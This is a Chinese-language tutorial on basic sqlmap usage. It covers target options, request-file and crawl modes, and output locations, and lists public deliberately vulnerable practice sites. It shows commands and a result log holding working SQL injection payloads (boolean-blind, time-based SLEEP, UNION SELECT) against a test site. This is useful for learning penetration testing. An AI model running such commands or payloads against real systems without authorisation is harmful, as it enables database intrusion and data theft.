SQLMap basic

發佈日期: 作者:

http://sqlmap.org
sqlmap是一个開源的渗透測試工具,可透過sql injection的手法做自動化檢測,檢測範圍包括取得資料庫數據和相關權限,瀏覽作業系統文件與執行作業系統命令等

常見參數介紹
https://www.tr0y.wang/2018/03/21/sqlmap-guide
https://xz.aliyun.com/t/3010

目標選擇

指定目標檢測

參數
-u 或 –url 指定url檢測
-p 指定要測試的參數,不指定就是所有的參數都試

GET

對所有get參數做檢測

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1

指定參數a和b檢測

sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b"

POST

參數 –data

使用post data測試

sqlmap -u "http://example.com" --data "a=1&b=2&c=3" --method POST

使用post  json測試

sqlmap -u "http://example.com" --data "{\"a\":\"abc\",\"b\":2}" --method POST

參數 –form 自動檢測post可用的form欄位

sqlmap -u http://testphp.vulnweb.com/artists.php --form

websocket

sqlmap -u ws://websocket.aaa.com:9091 --data'{"id": "1234"}'

refer
https://0xdf.gitlab.io/2023/06/10/htb-soccer.html#sql-injection-over-websockets

讀取request檔

參數 -r

範例 sqlmap -r request.txt

說明:使用Sqlmap+burpsuite對post注入

1.瀏覽器開啟目標後,這時候Burp會攔截到了相關請求

2.把這個request複製並命名為request.txt,內容大致如下 

POST /test.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/4.0

uname=1

3.執行sqlmap並使用以下指令:sqlmap -r request.txt

REFER
https://blog.csdn.net/kuxing100/article/details/8731973

批量讀取request檔

參數 -l 

指定一個 Burp 或 WebScarab 的代理日誌文件,Sqlmap 將從日誌檔案中解析出可能的攻擊目標,並逐一嘗試進行注入。此參數後面跟著一個表示日誌檔案的路徑。

讀取xml檔

Sqlmap 可以直接解析 xml 格式的網站地圖,從中提取攻擊目標

參數 -x

sqlmap -x http://example.com/sitemap.xml

讀url清單

可用將多個 URL 以一行一個的格式儲存在文字檔案中

參數 -m

sqlmap -m url.txt

url.txt內容大致如下

example1.com/vuln1.php?q=foobar
example2.com/vuln2.asp?id=1
example3.com/vuln3/id/1*123
example.com/login.php POST username=admin&password=1234
example.com/upload.php POST file=example.png&submit=true

測試表單

測試表單資料是否有註入點

參數 –forms

同時使用參數–forms和-u,Sqlmap 會解析u指定的那個 URL傳回頁面中的表單,測試表單是否有註入點,而不會對目標 URL 進行注入測試。

使用crawl

從目標URL開始爬取目標網站並收集可能存在漏洞的URL。使用此參數還需要設定爬取深度,深度是相對於開始爬取的目標 URL 而言的。只有所有新連結都被遞歸地訪問過後才算爬取結束。建議此參數與–delay配合使用。

參數:–crawl

sqlmap -u example.com --batch --crawl=3

輸出結果大致如下

[02:20:53] [INFO] starting crawler
[02:20:53] [INFO] searching for links with depth 1
[02:20:53] [WARNING] running in a single-thread mode. This could take a while
[02:20:53] [INFO] searching for links with depth 2
[02:20:54] [INFO] heuristics detected web page charset 'ascii'
[02:21:00] [INFO] 42/56 links visited (75%)

檢測結果

sqlmap跑完後結果會顯示在畫面上,同時也會儲存在日志中,例如/home/kali/.local/share/sqlmap/output/,常見檔案有以下幾種

home/kali/.local/share/sqlmap/output/results-*.csv

提供匯總數據,內容如下

Target URL,Place,Parameter,Technique(s),Note(s)
http://testphp.vulnweb.com/artists.php?artist=1,GET,artist,BTU,

home/kali/.local/share/sqlmap/output/< domain >/ target.txt 

http://testphp.vulnweb.com/artists.php?artist=1 (GET)  # /usr/bin/sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --batch

home/kali/.local/share/sqlmap/output/< domain >/ log

會記錄各種詳細的結果

sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4469=4469

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6311 FROM (SELECT(SLEEP(5)))DZNH)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-3553 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x56637273417949465365676d687042564b706c516e4e7443576c77616d5350714c4f4c6377637276,0x716a786271)-- -
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 4469=4469

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 6311 FROM (SELECT(SLEEP(5)))DZNH)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-3553 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x56637273417949465365676d687042564b706c516e4e7443576c77616d5350714c4f4c6377637276,0x716a786271)-- -
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] acuart
[*] information_schema
...omit...

線上測試弱點網站

HP Webinspect提供以下

  • http://zero.webappsecurity.com/index.html

IBM提供以下

  • http://demo.testfire.net/

Acunetix提供以下

  • http://testasp.vulnweb.com/
  • http://testphp.vulnweb.com/
  • http://testhtml5.vulnweb.com/
  • http://testaspnet.vulnweb.com/

OWASP提供以下

  • https://juice-shop.herokuapp.com

refer
https://ithelp.ithome.com.tw/articles/10202811
https://xdeath.tw/read.php?69
https://dotblogs.com.tw/a926/2016/01/07/094825
https://www.freebuf.com/sectool/164608.html